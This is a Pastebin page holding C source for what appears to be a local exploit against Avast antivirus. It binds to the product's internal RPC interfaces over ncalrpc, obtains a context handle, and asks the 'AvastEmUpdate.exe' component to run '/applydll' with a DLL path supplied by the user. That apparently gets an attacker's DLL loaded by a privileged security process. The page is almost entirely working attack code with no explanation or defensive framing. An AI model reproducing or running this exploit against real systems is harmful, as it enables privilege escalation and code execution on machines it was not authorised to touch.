Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #define _UNICODE
- #define UNICODE
- #include <windows.h>
- #include <tchar.h>
- #include <rpc.h>
- #include <strsafe.h>
- #include "aswpatchmgmt.h"
- #include "aavm4.h"
- #pragma comment( lib, "rpcrt4.lib" )
- void __RPC_FAR * __RPC_USER midl_user_allocate( size_t cBytes )
- {
- return ( ( void __RPC_FAR * )LocalAlloc( LPTR, cBytes ) );
- }
- void __RPC_USER midl_user_free( void __RPC_FAR * p )
- {
- LocalFree( p );
- }
- int _tmain( int argc, TCHAR *argv[] )
- {
- RPC_STATUS RpcStatus;
- TCHAR *StringBinding = NULL;
- RPC_BINDING_HANDLE RpcBindingHandle_PatchMgmt = NULL;
- RPC_BINDING_HANDLE RpcBindingHandle_Aavm4 = NULL;;
- LONG lResult, lReturn;
- INT i;
- PVOID pContextHandle = NULL;
- TCHAR szDllPath[MAX_PATH], szCommandLine[MAX_PATH];
- if ( argc != 2 )
- return 0;
- if ( GetCurrentDirectory( _countof( szDllPath ),
- szDllPath ) == 0 )
- {
- _tprintf( _T( "[-] GetCurrentDirectory() failed with error 0x%08x\n" ),
- GetLastError() );
- return 0;
- }
- if ( FAILED( StringCchCat( szDllPath,
- _countof( szDllPath ),
- _T( "\\" ) ) ) )
- return 0;
- if ( FAILED( StringCchCat( szDllPath,
- _countof( szDllPath ),
- argv[1] ) ) )
- return 0;
- if ( FAILED( StringCchCopy( szCommandLine,
- _countof( szCommandLine ),
- _T( "/applydll " ) ) ) )
- return 0;
- if ( FAILED( StringCchCat( szCommandLine,
- _countof( szCommandLine ),
- szDllPath ) ) )
- return 0;
- RpcStatus = RpcStringBindingCompose( _T( "dbe95f8e-2be7-4b70-96f3-369be27fa432" ),
- _T( "ncalrpc" ),
- NULL,
- _T( "[Aavm]" ),
- NULL,
- &StringBinding );
- if ( RPC_S_OK != RpcStatus )
- {
- _tprintf( _T( "[-] RpcStringBindingCompose() failed (0x%08x)\n" ),
- RpcStatus );
- goto CleanUp;
- }
- _tprintf( _T( "[?] %s\n" ), StringBinding );
- RpcStatus = RpcBindingFromStringBinding( StringBinding,
- &RpcBindingHandle_PatchMgmt );
- RpcStringFree( &StringBinding );
- if ( RPC_S_OK != RpcStatus )
- {
- _tprintf( _T( "[-] RpcBindingFromStringBinding() failed (0x%08x)\n" ),
- RpcStatus );
- goto CleanUp;
- }
- RpcStatus = RpcStringBindingCompose( _T( "eb915940-6276-11d2-b8e7-006097c59f07" ),
- _T( "ncalrpc" ),
- NULL,
- _T( "[Aavm]" ),
- NULL,
- &StringBinding );
- if ( RPC_S_OK != RpcStatus )
- {
- _tprintf( _T( "[-] RpcStringBindingCompose() failed (0x%08x)\n" ),
- RpcStatus );
- goto CleanUp;
- }
- _tprintf( _T( "[?] %s\n" ), StringBinding );
- RpcStatus = RpcBindingFromStringBinding( StringBinding,
- &RpcBindingHandle_Aavm4 );
- if ( RPC_S_OK != RpcStatus )
- {
- _tprintf( _T( "[-] RpcBindingFromStringBinding() failed (0x%08x)\n" ),
- RpcStatus );
- goto CleanUp;
- }
- RpcTryExcept
- {
- lResult = sub_1001AB90( RpcBindingHandle_PatchMgmt,
- &pContextHandle );
- _tprintf( _T( "[!] sub_1001AB90() returned 0x%08x (0x%08x)\n" ),
- lResult,
- pContextHandle );
- }
- RpcExcept( 1 )
- {
- _tprintf( _T( "[-] An RPC exception has occurred (0x%08x)\n" ),
- RpcExceptionCode() );
- }
- RpcEndExcept
- RpcTryExcept
- {
- lResult = sub_6500CC10( RpcBindingHandle_Aavm4,
- pContextHandle,
- 2, //AvastEmUpdate.exe
- szCommandLine,
- &lReturn );
- _tprintf( _T( "[!] sub_6500CC10() returned 0x%08x\n" ),
- lResult );
- }
- RpcExcept( 1 )
- {
- _tprintf( _T( "[-] An RPC exception has occurred (0x%08x)\n" ),
- RpcExceptionCode() );
- }
- RpcEndExcept
- CleanUp:
- if ( NULL != RpcBindingHandle_Aavm4 )
- {
- RpcBindingFree( &RpcBindingHandle_Aavm4 );
- }
- if ( NULL != RpcBindingHandle_PatchMgmt )
- {
- RpcBindingFree( &RpcBindingHandle_PatchMgmt );
- }
- if ( NULL != StringBinding )
- {
- RpcStringFree( &StringBinding );
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement